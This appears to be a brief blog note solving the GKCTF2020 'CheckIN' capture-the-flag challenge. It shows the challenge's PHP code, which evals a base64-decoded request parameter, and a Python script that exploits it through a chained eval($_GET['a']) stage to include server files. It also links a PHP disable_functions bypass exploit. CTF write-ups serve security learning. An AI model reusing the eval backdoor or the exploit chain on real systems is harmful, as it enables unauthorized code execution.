[GKCTF2020]CheckIN

https://www.gem-love.com/ctf/2361.html#CheckIN
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();
import requests
from base64 import *
from urllib.parse import quote as q

payload = "var_dump(include('/tmp/1.txt'));"
#url = "http://8727791d-0b5b-41f6-a3c4-e33252808486.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a="

#payload = b64encode(payload.encode())
payload = q(payload)
r = requests.get(url+payload)
print(url+payload)
print(r.text[3053:])
posted @ 2020-05-25 16:38  youmg  阅读(254)  评论(0编辑  收藏